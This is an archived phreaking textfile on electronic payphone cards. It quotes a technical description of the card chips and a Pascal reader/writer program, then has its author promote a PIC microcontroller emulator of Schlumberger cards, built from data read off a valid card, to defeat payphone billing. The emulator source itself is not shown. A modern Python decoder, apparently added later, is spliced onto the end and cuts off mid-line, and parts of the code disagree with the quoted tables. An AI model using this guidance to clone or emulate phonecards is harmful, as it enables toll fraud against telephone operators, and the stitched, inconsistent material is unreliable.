💾 Archived View for gemini.spam.works › mirrors › textfiles › phreak › telecard.txt captured on 2023-01-29 at 10:48:45.
Electronic Telephone Cards: How to make your own!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I guess that Sweden is not the only country that employs the electronic
phone card system from Schlumberger Technologies. This article will
explain a bit about the cards they use and how they work. At the end of
this article you will also find a UUEncoded file which contains the
source code for a PIC16C84 microcontroller program that completely
emulates a Schlumberger telephone card, and of course printed circuit
board layouts plus a component list...

But before we begin talking seriously about this matter I must first make
it completely clear that whatever you use this information for is
entirely YOUR responsibility, and I cannot be held liable for any problems
that the use of this information may cause for you or for anybody else.
In other words: I give this away FOR FREE, and I don't expect to get
ANYTHING back in return!

The Original Telephone Card:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Since I would probably have had a hard time writing a better article than
the one Stephane Bausson from France wrote a while ago, I will not attempt
to give a better explanation than that one; I will instead incorporate it
in this phile. I do want to make it clear that the following part about
the cards' technical specification was not written by me: only the parts
in quotes are things added by me... Instead I will concentrate on
explaining how to build your own telephone card emulator, how the
security measures in the payphone system created by Schlumberger
Technologies work, and how to trick it... But first, let's have a look at
the technical specifications of the various "smart memory card" systems
used for the payphones.
<Start of text quoted from Stephane Bausson (sbausson@ensem.u-nancy.fr)>
------------------------------------------------------------------------------

===============================================================================
              What you need to know about electronic telecards
===============================================================================

(C) 10-07-1993 / 03-1994     Version 1.06

Stephane BAUSSON
Email: sbausson@ensem.u-nancy.fr
Smail: 4, Rue de Grand; F-88630 CHERMISEY; France
Phone: (33)-29-06-09-89

-------------------------------------------------------------------------------
Any suggestions or comments about phonecards and smart-cards are welcome
-------------------------------------------------------------------------------

Content
---------

I  ) The cards from Gemplus, Solaic, Schlumberger, Oberthur:
     I-1) Introduction:
     I-2) SCHEMATICS of the chip:
     I-3) PINOUT of the connector:
     I-4) Main features:
     I-5) TIME DIAGRAMS:
     I-6) Memory MAP of cards from France and Monaco:
     I-7) Memory MAP of cards from other countries:

II ) The cards from ODS: (German cards)
     II-1) Introduction:
     II-2) Pinout:
     II-3) Main features:
     II-4) Time Diagrams:
     II-5) Memory Map:
     II-6) Electrical features:

III) The Reader Schematic:

IV ) The program:

-------------------------------------------------------------------------------

I ) The cards from Gemplus, Solaic, Schlumberger, Oberthur: (French cards)
======================================================================

I-1) Introduction:
------------------

You must not think that electronic phonecards are completely secret
things, and that you cannot read the information that is inside. That is
quite false, since in fact an electronic phonecard does not contain any
secret information like credit cards do: an electronic phonecard is
nothing else than a 256-bit EPROM with serial output.

Besides, do not think that you are going to refill them once you have
understood how they work, since for that you would have to reset the 256
bits of the card by erasing the whole card. But the chip is coated in UV
opaque resin, even if sometimes it looks transparent! Even if you were
smart enough to erase the 256 bits of the card, you would then have to
program the manufacturer area, but this is quite impossible since these
first 96 bits are write protected by a lock-out fuse that is blown after
the card programming in the factory.

Nevertheless it can be very interesting to study how these cards work, to
see which kind of data is inside and how the data is mapped, or to see
how many units are left, for example. Besides, there are a great number
of applications for these cards once they are used up (only for personal
usage of course), since you can use them as a key to open a door, or as a
key to secure a program, etc...

These telecards were created in 1984, and at that time the constructors
decided to build them in NMOS technology; now they plan to change all the
readers in public booths by 1994 and use CMOS technology. They also plan
to use EEPROM to secure the cards and to add many useful pieces of
information, so you will perhaps use phone cards to buy your bread or
anything else. These cards are called Second Generation Telecards.

I-2) SCHEMATICS of the chip:
----------------------------

               .-------------------.
               |                   |
        --|>   Clk                 |
               |   _               |
        --|    R/W                 |
               |                   |
        --|    Reset               |
               |                   |
        --|    Fuse                |
               |                   |
        --|    Vpp                 |
               |                   |
               '-.             .-'
                 |             |
               .-------------------.
               |        Out        |--  serial output
               '-------------------'
I-3) PINOUT of the connector:
-----------------------------

          AFNOR CHIP                          ISO CHIP
          ----------                          --------
  -------------+-------------         -------------+-------------
  |     8      |     4      |         |     1      |     5      |
  |            |            |         |            |            |
  +-------\    |    /-------+         +-------\    |    /-------+
  |     7 +----+----+ 3     |         |     2 +----+----+ 6     |
  |       |    |    |       |         |       |    |    |       |
  +--------|       |--------+         +--------|       |--------+
  |     6  |       |  2     |         |     3  |       |  7     |
  |       +----+----+       |         |       +----+----+       |
  +-------/    |    \-------+         +-------/    |    \-------+
  |     5      |     1      |         |     4      |     8      |
  |            |            |         |            |            |
  -------------+-------------         -------------+-------------

NB: only the position of the chip is ISO standardized, not the pinout.

PINOUT:          1 : Vcc = 5V        5 : Gnd
------           2 : R/W             6 : Vpp = 21V
                 3 : Clock           7 : I/O
                 4 : Reset           8 : Fuse

I-4) Main features:
-------------------

 - Synchronous protocol.
 - N-MOS technology.
 - 256x1 bit organisation.
 - 96 bits write protected by a lock-out fuse.
 - Low power: 85mW in read mode.
 - 21 V programming voltage.
 - Access time: 500ns
 - Operating range: -10°C to +70°C
 - Ten year data retention.

I-5) TIME DIAGRAMS:
-------------------

[Timing diagram (the drawing did not survive this copy; the signals it
showed were Vpp, Reset, Clock, R/W and Out). Vpp rests at +5V and is
raised to +21V only while a bit is being written. Reset is pulsed high
once to reset the card, then each Clock pulse advances to the next bit,
whose value appears on Out. To write a bit, R/W is held high while Clock
and Vpp are high; the write pulses last 10 to 50 ms. The sequence shown
was: reset card, bit 1 reading, bit 2 reading, bit 2 writing to 1, bit 3
reading.]

I-6) MEMORY MAP of cards from France and Monaco:
------------------------------------------------

  Bytes    Bits            Binary     Hexa
                         +-----------+-----+
    1      1 -->   8     |           |     |  ---> Builder code.
                         +-----------+-----+
    2      9 -->  16     | 0000 0011 | $03 |  ---> a French telecard
                         +-----------+-----+
    3     17 -->  24     |           |     |
                         +-----------+-----+
    4     25 -->  32     |           |     |
                         +-----------+-----+
    5     33 -->  40     |           |     |
                         +-----------+-----+
    6     41 -->  48     |           |     |
                         +-----------+-----+
    7     49 -->  56     |           |     |
                         +-----------+-----+
    8     57 -->  64     |           |     |
                         +-----------+-----+
    9     65 -->  72     |           |     |
                         +-----------+-----+
   10     73 -->  80     |           |     |
                         +-----------+-----+
   11     81 -->  88     |           |     |
                         +-----------+-----+
   12     89 -->  96     | 0001 0011 | $13 |  ---> 120 units card
                         | 0000 0110 | $06 |  ---> 50 units card
                         | 0000 0101 | $05 |  ---> 40 units card
                         +-----------+-----+
 13-31    97 --> 248     |           |     |  ---> The units area: each time a unit
                         |           |     |       is used, a bit is set to "1";
                         |           |     |       generally the first ten units are
                         |           |     |       fused in the factory as a test.
                         |           |     |
                         +-----------+-----+
   32    249 --> 256     | 1111 1111 | $FF |  ---> the card is empty
                         +-----------+-----+

I-7) MEMORY MAP of the other cards:
-----------------------------------

  Bytes    Bits            Binary     Hexa
                         +-----------+-----+
    1      1 -->   8     |           |     |
                         +-----------+-----+
    2      9 -->  16     | 1000 0011 | $83 |  ---> a telecard
                         +-----------+-----+-----------+-----+
  3-4     17 -->  32     | 1000 0000 | $80 | 0001 0010 | $12 |  ---> 10 units card
                         |           |     | 0010 0100 | $24 |  ---> 22 units card
                         |           |     | 0010 0111 | $27 |  ---> 25 units card
                         |           |     | 0011 0010 | $32 |  ---> 30 units card
                         |           |     | 0101 0010 | $52 |  ---> 50 units card
                         |           |     | 1000 0010 | $82 |  ---> 80 units card
                         | 1000 0001 | $81 | 0000 0010 | $02 |  ---> 100 units card
                         |           |     | 0101 0010 | $52 |  ---> 150 units card
                         +-----------+-----+-----------+-----+
    5     33 -->  40     |           |     |
                         +-----------+-----+
    6     41 -->  48     |           |     |
                         +-----------+-----+
    7     49 -->  56     |           |     |
                         +-----------+-----+
    8     57 -->  64     |           |     |
                         +-----------+-----+
    9     65 -->  72     |           |     |
                         +-----------+-----+
   10     73 -->  80     |           |     |
                         +-----------+-----+
   11     81 -->  88     |           |     |
                         +-----------+-----+
   12     89 -->  96     | 0001 1110 | $1E |  ---> Sweden
                         | 0010 0010 | $22 |  ---> Spain
                         | 0011 0000 | $30 |  ---> Norway
                         | 0011 0011 | $33 |  ---> Andorra
                         | 0011 1100 | $3C |  ---> Ireland
                         | 0100 0111 | $47 |  ---> Portugal
                         | 0101 0101 | $55 |  ---> Czech Republic
                         | 0101 1111 | $5F |  ---> Gabon
                         | 0110 0101 | $65 |  ---> Finland
                         +-----------+-----+
 13-31    97 --> 248     |           |     |  ---> The units area: each time a unit
                         |           |     |       is used, a bit is set to "1";
                         |           |     |       generally the first two units are
                         |           |     |       fused in the factory as a test.
                         |           |     |
                         +-----------+-----+
   32    249 --> 256     | 0000 0000 | $00 |
                         +-----------+-----+

II ) The cards from ODS, Giesecke & Devrient, ORGA Kartensysteme,
=================================================================
     Uniqua, Gemplus, Schlumberger and Oldenbourg Kartensysteme:
     ===========================================================

II-1) Introduction:
-------------------

These cards are in fact 128-bit memories in NMOS technology, and the map
of these cards is the following:

   64 bit EPROM, write protected (manufacturer area).
   40 bit EEPROM (5x8 bits).
   24 bits set to "1".

II-2) Pinout:
-------------

          ISO 7816-2
  -------------+-------------
  |     1      |     5      |         Pinout:
  |            |            |         -------
  +-------\    |    /-------+
  |     2 +----+----+ 6     |         1 : Vcc = 5V      5 : Gnd
  |       |    |    |       |         2 : Reset         6 : n.c.
  +--------|       |--------+         3 : Clock         7 : I/O
  |     3  |       |  7     |         4 : n.c.          8 : n.c.
  |       +----+----+       |
  +-------/    |    \-------+         n.c. : not connected
  |     4      |     8      |
  |            |            |
  -------------+-------------

II-3) Main features:
--------------------

 - ISO 7816-1/2 compatible.
 - uses a single 5V power supply.
 - low power consumption.
 - NMOS technology.

II-4) Time Diagrams:
--------------------

Reset:
------

The address counter is reset to 0 when the clock line CLK is raised while
the control line R is high. Note that the address counter cannot be reset
when it is in the range 0 to 7.
[Timing diagram (not recoverable from this copy): Reset goes high, the
next Clk pulse sets the address counter to 0, and each following Clk
pulse steps the address through n, 0, 1, 2, 3, 4 while Data shows bit n,
bit 0, bit 1, bit 2, bit 3.]

The address counter is incremented by 1 with each rising edge of the
clock signal Clk, for as long as the control line R remains low. The data
held in each addressed bit is output to the I/O contact each time Clk
falls. It is not possible to decrement the address counter; therefore, to
address an earlier bit, the address counter must be reset and then
incremented to the required value.

Write:
------

All unwritten or erased bits in the address range 64-104 may be written
to. When a memory cell is written to, it is set to 0. The addressed cell
is written to by the following sequence:

 1- R is raised while Clk is low, to disable the address counter
    increment for one clock pulse.
 2- Clk is then raised for a minimum of 10ms to write to the addressed
    bit.

When the write operation ends and Clk falls, the address counter is
unlocked, and the content of the written cell, which is now 0, is output
to the I/O contact if the operation was correct. The next Clk pulse will
increment the address by one, then the write sequence can be repeated to
write the next bit.

[Timing diagram (not recoverable from this copy): two write cycles on
Reset (R), Clk and I/O over addresses n, n+1, n+2, n+3; for each write, R
is pulsed while Clk is low, then Clk is held high for the write window,
after which I/O shows the written bit.]

WriteCarry:
-----------

A counter is erased by performing the WRITECARRY sequence on the stage of
the next highest weighting to the one to be erased. The writecarry
sequence is as follows:

 1 - Set the address counter to an unwritten bit in the next highest
     counter stage to the one to be erased.
 2 - Increment is disabled on the following rising edge of R, where Clk
     remains low.
 3 - Clk is then raised for a minimum of 10ms, while R is low, to write
     to the next address bit.
 4 - R is then raised again while Clk remains low, to disable increment
     a second time.
 5 - Clk is then raised for a minimum of 1ms, while R is low, to write
     to the addressed bit a second time, erasing the counter level
     immediately below that of the addressed bit.

[Timing diagram (not recoverable from this copy): Rst (R) is pulsed twice
while Clk is low; Clk is then held high for the write, and a second time
for the erase, all at address n, before moving on to n+1; I/O is labelled
"Write" under the first Clk pulse and "Erase" under the second.]

II-5) Memory Map:
-----------------

  Bytes    Bits            Binary     Hexa
                         +-----------+-----+
    1      1 -->   8     |           |     |
                         +-----------+-----+
    2      9 -->  16     | 0010 1111 | $2F |  ---> Germany
                         | 0011 0111 | $37 |  ---> Netherlands
                         | 0011 1011 | $3B |  ---> Greece
                         +-----------+-----+
    3     17 -->  24     |           |     |
    4     25 -->  32     |           |     |  ---> Issuer area (write protected)
    5     33 -->  40     |           |     |
    6     41 -->  48     |           |     |
    7     49 -->  56     |           |     |
    8     57 -->  64     |           |     |
                         +-----------+-----+
    9     65 -->  72     |           |     |  ---> c4096 )
   10     73 -->  80     |           |     |  ---> c512  )
   11     81 -->  88     |           |     |  ---> c64   )  5 stage octal counter
   12     89 -->  96     |           |     |  ---> c8    )
   13     97 --> 104     |           |     |  ---> c0    )
                         +-----------+-----+
   14    105 --> 112     | 1111 1111 | $FF |
   15    113 --> 120     | 1111 1111 | $FF |  ---> area of bits set to "1"
   16    121 --> 128     | 1111 1111 | $FF |
                         +-----------+-----+

The Issuer area:
----------------

The issuer area consists of 40 bits. Its contents are specified by the
card issuer and are fixed during the manufacturing process. They will
include data such as serial numbers, dates, and distribution centers.
This area may only be read.

The Counter area:
-----------------

The counter area stores the card's units. Its initial value is specified
by the card issuer and set during manufacturing. The counter area is
divided into a 5 stage abacus. Note that you can only decrease the
counter; writing a value greater than the old value into the counter is
not authorised.
II-6) Electrical features:
--------------------------

Maximum ratings:
----------------

  +----------------------+--------+------+------+------+
  |                      | Symbol | Min  | Max  | Unit |
  +----------------------+--------+------+------+------+
  | Supply voltage       | Vcc    | -0.3 | 6    | V    |
  +----------------------+--------+------+------+------+
  | Input voltage        | Vss    | -0.3 | 6    | V    |
  +----------------------+--------+------+------+------+
  | Storage temperature  | Tstg   | -20  | +55  | °C   |
  +----------------------+--------+------+------+------+
  | Power dissipation    | Pd     | -    | 50   | mW   |
  +----------------------+--------+------+------+------+

DC characteristics:
-------------------

  +---------------------------+--------+-----+-----+-----+------+
  |                           | Symbol | Min.| Typ.| Max.| Unit |
  +---------------------------+--------+-----+-----+-----+------+
  | Supply current            | Icc    | -   | -   | 5   | mA   |
  +---------------------------+--------+-----+-----+-----+------+
  | Input voltage (low)       | Vl     | 0   | -   | 0.8 | V    |
  +---------------------------+--------+-----+-----+-----+------+
  | Input voltage (high)      | Vh     | 3.5 | -   | Vcc | V    |
  +---------------------------+--------+-----+-----+-----+------+
  | Input current R           | Ih     | -   | -   | 100 | uA   |
  +---------------------------+--------+-----+-----+-----+------+
  | Input current Clk         | Il     | -   | -   | 100 | uA   |
  +---------------------------+--------+-----+-----+-----+------+
  | Output current (Vol=0.5V) | Iol    | -   | -   | 10  | uA   |
  +---------------------------+--------+-----+-----+-----+------+
  | Output current (Voh=5V)   | Ioh    | -   | -   | 0.5 | mA   |
  +---------------------------+--------+-----+-----+-----+------+

AC characteristics:
-------------------

  +----------------------+--------+------+------+------+
  |                      | Symbol | Min. | Max. | Unit |
  +----------------------+--------+------+------+------+
  | Pulse duration       | tr     | 50   | -    | us   |
  |   R address reset    |        |      |      |      |
  +----------------------+--------+------+------+------+
  | Pulse duration       | ts     | 10   | -    | us   |
  |   R write            |        |      |      |      |
  +----------------------+--------+------+------+------+
  | High level Clk       | th     | 8    | -    | us   |
  +----------------------+--------+------+------+------+
  | Low level Clk        | tl     | 12   | -    | us   |
  +----------------------+--------+------+------+------+
  | Write window         | Twrite | 10   | -    | ms   |
  +----------------------+--------+------+------+------+
  | Erase window         | Terase | 10   | -    | ms   |
  +----------------------+--------+------+------+------+
  |                      | tv1    | 5    | -    | us   |
  +----------------------+--------+------+------+------+
  |                      | tv2    | 3.5  | -    | us   |
  +----------------------+--------+------+------+------+
  |                      | tv3    | 3.5  | -    | us   |
  +----------------------+--------+------+------+------+
  |                      | tv4    | 3.5  | -    | us   |
  +----------------------+--------+------+------+------+
  |                      | tv5    | 3.5  | -    | us   |
  +----------------------+--------+------+------+------+
  |                      | tv6    | 5    | -    | us   |
  +----------------------+--------+------+------+------+
  |                      | tv7    | 5    | -    | us   |
  +----------------------+--------+------+------+------+
  |                      | tv8    | 10   | -    | us   |
  +----------------------+--------+------+------+------+

III) The Reader Schematic:
==========================

[Schematic (the drawing did not survive this copy). What can still be
read from it: the reader hangs off the PC's Centronics port, using pin 1
(Str), pins 2 to 9 (D0 to D7), pin 10 (Ack), pin 11 (Busy) and pin 25
(ground). Components: T1 BC107 NPN, T2 BC177 PNP, d1 to d13 1N4148,
r1 22k, r2 220, r3 220k, r4 390k, r5 15k, r6 150k, r7 10; a 22.5V
battery for the programming voltage, with an optional external 5V
supply. The chip connector carries Fuse, Reset, I/O, Clk, Vpp, R/W, Gnd
and 5V.]
IV) The program:
================

The following program will enable you to read telecards on your PC if
you build the preceding reader.

--------------- cut here (begin)
{*****************************************************************************}
{                       T E L E C A R D . P A S                               }
{*****************************************************************************}
{ This program enables you to dump the memory of electronic phonecards        }
{ from all over the world, so that you will be able to see which country      }
{ the card is from, how many units are left and so on ....                    }
{*****************************************************************************}
{                                                                             }
{ Written by Stephane BAUSSON (1993)                                          }
{                                                                             }
{ Email: sbausson@ensem.u-nancy.fr                                            }
{                                                                             }
{ Snail Mail Address: 4, Rue de Grand                                         }
{                     F-88630 CHERMISEY                                       }
{                     France                                                  }
{                                                                             }
{*****************************************************************************}
{* Thanks to: Tomi Engdahl (Tomi.Engdahl@hut.fi)                             *}
{*****************************************************************************}

USES crt,dos;

CONST
  port_address=$378;                    { lpt1 chosen }

TYPE
  string8=string[8];
  string2=string[2];

VAR
  reg         : registers;
  i,j         : integer;
  Data        : array[1..32] of byte;   { raw dump, one byte per 8 card bits }
  car         : char;
  byte_number : integer;                { 32 for a 256 bit card, 16 for 128 bits }
  displaying  : char;

{-----------------------------------------------------------------------------}
PROCEDURE Send(b:byte);
BEGIN
  port[port_address]:=b;
END;

{-----------------------------------------------------------------------------}
FUNCTION Get:byte;
BEGIN
  get:=port[port_address+1];
END;

{-----------------------------------------------------------------------------}
{ FUNCTION dec2hexa_one(decimal_value):hexa_character_representation;         }
{                                                                             }
{ - convert a 4 bit long decimal number to hexadecimal.                       }
{-----------------------------------------------------------------------------}
FUNCTION dec2hexa_one(value:byte):char;
BEGIN
  case value of
    0..9   : dec2hexa_one:=chr(value+$30);
    10..15 : dec2hexa_one:=chr(value+$37);
  END;
END;

{-----------------------------------------------------------------------------}
{ FUNCTION d2h(decimal_byte):string2;                                         }
{                                                                             }
{ - convert a decimal byte to its hexadecimal representation.                 }
{-----------------------------------------------------------------------------}
FUNCTION d2h(value:byte):string2;
VAR msbb,lsbb:byte;
BEGIN
  msbb:=0;
  if ( value >= $80 ) then BEGIN msbb:=msbb+8; value:=value-$80; END;
  if ( value >= $40 ) then BEGIN msbb:=msbb+4; value:=value-$40; END;
  if ( value >= $20 ) then BEGIN msbb:=msbb+2; value:=value-$20; END;
  if ( value >= $10 ) then BEGIN msbb:=msbb+1; value:=value-$10; END;
  lsbb:=0;
  if ( value >= $08 ) then BEGIN lsbb:=lsbb+8; value:=value-$08; END;
  if ( value >= $04 ) then BEGIN lsbb:=lsbb+4; value:=value-$04; END;
  if ( value >= $02 ) then BEGIN lsbb:=lsbb+2; value:=value-$02; END;
  if ( value >= $01 ) then BEGIN lsbb:=lsbb+1; value:=value-$01; END;
  d2h := dec2hexa_one(msbb) + dec2hexa_one(lsbb);
END;

{-----------------------------------------------------------------------------}
{ - return the 8 character binary representation of a byte, MSB first.        }
{-----------------------------------------------------------------------------}
Function Binary( b : byte):string8;
var weigth : byte;
    s      : string8;
BEGIN
  weigth:=$80;
  s:='';
  while (weigth > 0) do
  BEGIN
    if ((b and weigth) = weigth) then s:=s+'1' else s:=s+'0';
    weigth:=weigth div $02;
  END;
  Binary:=s;
END;

{-----------------------------------------------------------------------------}
{ - count the leading "1" bits of the units area (from byte 13 on): the       }
{   number of units burnt, factory test units included (256 bit cards).       }
{-----------------------------------------------------------------------------}
FUNCTION Units:byte;
VAR u, i : integer;
    s    : string8;
BEGIN
  u:=0;
  i:=13;
  while (Data[i] = $FF) do
  BEGIN
    u:=u+8;
    i:=i+1;
  END;
  s:=Binary(Data[i]);
  while(s[1]='1') do
  BEGIN
    inc(u);
    s:=copy(s,2,length(s));
  END;
  units:=u;
END;

{-----------------------------------------------------------------------------}
{ - units of a 128 bit card: weighted sum of the 5 counter stages (bytes 9-13)}
{-----------------------------------------------------------------------------}
function Units_2:LongInt;
BEGIN
  Units_2:=4096*Data[9]+512*Data[10]+64*Data[11]+8*Data[12]+Data[13];
END;

{-----------------------------------------------------------------------------}
PROCEDURE Card_Type;
BEGIN
  case Data[2] of
    $03: BEGIN
           write('Telecard - France - ');
           case Data[12] of
             $13: write('120 Units - ',units-130,' Units left');
             $06: write('50 Units - ',units-60,' Units left');
             $15: write('40 Units - ',units-40,' Units left');
           END;
         END;
    $2F: BEGIN
           write('Telecard - Germany - ', Units_2, ' Units left');
         END;
    $3B: BEGIN
           write('Telecard - Greece - ', Units_2, ' Units left');
         END;
    $83: BEGIN
           write('Telecard');
           case Data[12] of
             $1E: write(' - Sweden');
             $30: write(' - Norway');
             $33: write(' - Andorra');
             $3C: write(' - Ireland');
             $47: write(' - Portugal');
             $55: write(' - Czech Republic');
             $5F: write(' - Gabon');
             $65: write(' - Finland');
           END;
           if (Data[12] in [$30,$33,$3C,$47,$55,$65]) then
           BEGIN
             case ((Data[3] and $0F)*$100+Data[4]) of
               $012: write (' - 10 Units - ',units-12,' Units left');
               $024: write (' - 22 Units - ',units-24,' Units left');
               $027: write (' - 25 Units - ',units-27,' Units left');
               $032: write (' - 30 Units - ',units-32,' Units left');
               $052: write (' - 50 Units - ',units-52,' Units left');
               $067: write (' - 65 Units - ',units-62,' Units left');
               $070: write (' - 70 Units - ',units-70,' Units left');
               $102: write (' - 100 Units - ',units-102,' Units left');
               $152: write (' - 150 Units - ',units-152,' Units left');
             END;
           END;
           { write(' - N° ',Data[5]*$100+Data[6]);}
         END;
  END;
END;

{-----------------------------------------------------------------------------}
PROCEDURE waiting;
BEGIN
  send($00);
  write('Enter a card in the reader and press a key ...');
  repeat until keypressed;
  gotoxy(1, wherey);
  clreol;
END;

{-----------------------------------------------------------------------------}
PROCEDURE Full_Displaying;
BEGIN
  writeln('Memory dump:');
  for i:=1 to 80 do write('-');
  for i:=1 to (byte_number div 6 + 1) do
  BEGIN
    for j:=1 to 6 do
    BEGIN
      if j+6*(i-1) <= byte_number then write(binary(Data[j+6*(i-1)]):9);
    END;
    gotoxy(60,wherey);
    for j:=1 to 6 do
      if j+6*(i-1) <= byte_number then write(d2h(Data[j+6*(i-1)]),' ');
    writeln;
  END;
  for i:=1 to 80 do write('-');
  Card_Type;
  writeln;
END;

{-----------------------------------------------------------------------------}
PROCEDURE Short_Displaying;
VAR j : integer;
BEGIN
  for j:=1 to byte_number do
  BEGIN
    write(d2h(Data[j]),' ');
  END;
  writeln;
END;

{-----------------------------------------------------------------------------}
{ - reset the card, then clock out 256 bits, one bit per clock pulse.         }
{-----------------------------------------------------------------------------}
PROCEDURE Reading;
VAR i, j  : integer;
    Value : byte;
BEGIN
  send($FE);
  send($F8);
  for i:=1 to 32 do
  BEGIN
    Value:=0;
    for j:=1 to 8 do
    BEGIN
      Value:=Value*$02 + ((get and $08) div $08);
      send($FB);
      delay(1);
      send($F8);
    END;
    Data[i]:=Value;
  END;
  case displaying of
    'F':full_displaying;
    'S':short_displaying;
  END;
END;

{-----------------------------------------------------------------------------}
PROCEDURE writting;
VAR i,n : integer;
    car : char;
BEGIN
  write('Which bit do you want to set to "1" : ');
  readln(n);
  waiting;
  car:=readkey;
  send($FA);
  send($F8);
  for i:=1 to n do
  BEGIN
    send($F9);
    if i=n then
    BEGIN
      send($FD);
      delay(20);
      send($FF);
      delay(20);
    END;
    send($FB);
  END;
  reading;
END;

{-----------------------------------------------------------------------------}
PROCEDURE Saving;
VAR filename : string;
    f        : text;
    i        : word;
BEGIN
  write('Enter the filename: ');
  readln(filename);
  assign(f, filename);
  rewrite(f);
  for i:=1 to byte_number do write(f,d2h(Data[i]),' ');
  close(f);
END;

{-----------------------------------------------------------------------------}
PROCEDURE initialize;
VAR i : integer;
BEGIN
  byte_number:=32;
  displaying:='F';
  clrscr;
  writeln(' 1  - to dump a 256 bits card');
  writeln(' 2  - to dump a 128 bits card');
  writeln(' F  - to display in full format');
  window(41,1,80,25);
  writeln(' S  - to display in short format');
  writeln(' F2 - to save in a file');
  writeln(' Q  - to exit the program');
  window(1,4,80,25);
  for i:=1 to 80 do write('=');
  window(1,5,80,25);
END;

{=============================================================================}
BEGIN
  initialize;
  repeat
    waiting;
    car:=upcase(readkey);
    case car of
      'W':writting;
      'Q':;
      '1':byte_number:=32;
      '2':byte_number:=16;
      'F','S':displaying:=car;
      #00: BEGIN
             car:=readkey;
             if car=#60 then saving;
           END;
      else reading;
    END;
  until car='Q';
END.
--------------- cut here (end)

_/_/_/_/_/   Stephane BAUSSON
_/_/_/_/_/   Engineering student at ENSEM (Nancy - France)
_/_/_/_/_/   Smail: 4, Rue de Grand, F-88630 CHERMISEY, France
_/_/_/_/_/
_/_/_/_/_/   Email: sbausson@ensem.u-nancy.fr
------------------------------------------------------------------------------

<End of text quoted from Stephane Bausson's text about the telephone cards>.

The Program:
~~~~~~~~~~~~

Well, when I saw this phile about the cards for the first time, about a
year ago, I quickly realized that this system is very insecure and really
needs to be hacked. So now I present you with a piece of software for the
PIC 16C84 RISC microcontroller from Microchip that will take care of
emulating the cards used by Schlumberger and others. This system is to be
found in Scandinavia (Sweden, Norway and Finland), Spain, France and other
countries. I do know that France probably needs some small modifications
for this to work, but I see no reason why it shouldn't do so!

For this to work you need access to a PROM burner which can handle the
PIC 16C84, or you might just build one yourself, as I include some plans
for that in the UUEncoded block to be found at the end of this phile.

First of all, you have to read off the first 12 bytes of data from a valid
card from the country you wish your emulator to work in, because I don't
think it would be a good idea to publish stolen card identities in Phrack.
Then you simply enter those 12 bytes of data in the proper place in my
program and compile it. That's it... And since I happened to choose a
version of the PIC with internal Data EEPROM, that means that the first
12 locations of the Data EEPROM should contain the card ID bytes.

As of today this code should work smooth and fine, but maybe you'll need
to modify it later on when Schlumberger gets tired of my hack. But since
the PIC is a very fast and powerful microcontroller it might be quite hard
for them to come up with a solution to this problem.
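The memory maps in Bausson's text quoted above (sections I-6 and I-7 for the 256-bit cards, II-5 for the 128-bit ODS cards) decoded in Python, as an added example written for this edit; it is not Bausson's reader program and not part of the original phile. It assumes a dump already read into bytes (one byte per eight card bits, in the order the reader above stores them), and the sample dumps are constructed for illustration, not real card identities. The units figure for the 128-bit cards follows the Units_2 formula of the reader program; the plausibility check uses the two rules stated in II-5 (issuer area read-only, counter may only decrease) to flag a pair of dumps that could not come from the same card used normally.

```python
# Added example, not from the original phile: decode the card dumps described
# in the quoted sections I-6, I-7 and II-5. All sample dumps are constructed.

def bits_of(data: bytes) -> str:
    """MSB-first bit string of a byte sequence, as the dump tables print it."""
    return "".join(f"{b:08b}" for b in data)

# Section I-6: byte 12 of a French card gives the denomination.
FRENCH_DENOMINATIONS = {0x13: 120, 0x06: 50, 0x05: 40}
# Section I-7: bytes 3-4 give the denomination of the other 256-bit cards.
OTHER_DENOMINATIONS = {
    (0x80, 0x12): 10, (0x80, 0x24): 22, (0x80, 0x27): 25, (0x80, 0x32): 30,
    (0x80, 0x52): 50, (0x80, 0x82): 80, (0x81, 0x02): 100, (0x81, 0x52): 150,
}
# Section I-7: byte 12 gives the country.
COUNTRIES = {0x1E: "Sweden", 0x22: "Spain", 0x30: "Norway", 0x33: "Andorra",
             0x3C: "Ireland", 0x47: "Portugal", 0x55: "Czech Republic",
             0x5F: "Gabon", 0x65: "Finland"}
# Section II-5: byte 2 gives the country of a 128-bit card.
ODS_COUNTRIES = {0x2F: "Germany", 0x37: "Netherlands", 0x3B: "Greece"}


def burnt_units(dump: bytes) -> int:
    """Leading '1' bits of the units area (bytes 13-31, bits 97-248).
    Each used unit sets one more bit, so the run of ones is the number of
    units consumed, factory test units included."""
    area = bits_of(dump[12:31])
    return len(area) - len(area.lstrip("1"))


def decode_256(dump: bytes) -> dict:
    """Interpret a 32-byte dump of a Gemplus/Solaic/Schlumberger/Oberthur card."""
    if len(dump) != 32:
        raise ValueError("a 256-bit card dumps to exactly 32 bytes")
    used = burnt_units(dump)
    if dump[1] == 0x03:                       # I-6: French telecard
        country = "France/Monaco"
        denom, test = FRENCH_DENOMINATIONS.get(dump[11]), 10
    elif dump[1] == 0x83:                     # I-7: other countries
        country = COUNTRIES.get(dump[11], f"unknown (${dump[11]:02X})")
        denom, test = OTHER_DENOMINATIONS.get((dump[2], dump[3])), 2
    else:
        raise ValueError(f"byte 2 = ${dump[1]:02X} is not a known telecard marker")
    # Units left = denomination minus the units burnt beyond the factory test bits.
    left = None if denom is None else denom - max(used - test, 0)
    return {"country": country, "denomination": denom, "used": used, "left": left}


def decode_128(dump: bytes) -> dict:
    """Interpret a 16-byte dump of an ODS-type card (II-5). The units value is the
    weighted sum over the five counter stages (bytes 9-13), exactly as the
    reader program's Units_2 computes it."""
    if len(dump) != 16:
        raise ValueError("a 128-bit card dumps to exactly 16 bytes")
    country = ODS_COUNTRIES.get(dump[1], f"unknown (${dump[1]:02X})")
    stages = list(dump[8:13])                 # c4096, c512, c64, c8, c0
    units = sum(w * c for w, c in zip((4096, 512, 64, 8, 1), stages))
    return {"country": country, "units": units, "stages": stages}


def counter_only_decreases(before: bytes, after: bytes) -> bool:
    """Plausibility check for two dumps of the same ODS card taken before and
    after use: the issuer area (bytes 1-8) is read-only and the counter may only
    go down. False means the pair cannot come from normal use of one card."""
    if before[:8] != after[:8]:
        return False
    return decode_128(after)["units"] <= decode_128(before)["units"]


# Constructed sample dumps (assumed values, not real card identities); header
# bytes the tables give no meaning to are left at zero.
SAMPLE_SWEDEN_50 = bytes([0x00, 0x83, 0x80, 0x52] + [0x00] * 7 + [0x1E]
                         + [0xFF, 0xF0] + [0x00] * 17 + [0x00])
SAMPLE_FRANCE_120 = bytes([0x00, 0x03] + [0x00] * 9 + [0x13]
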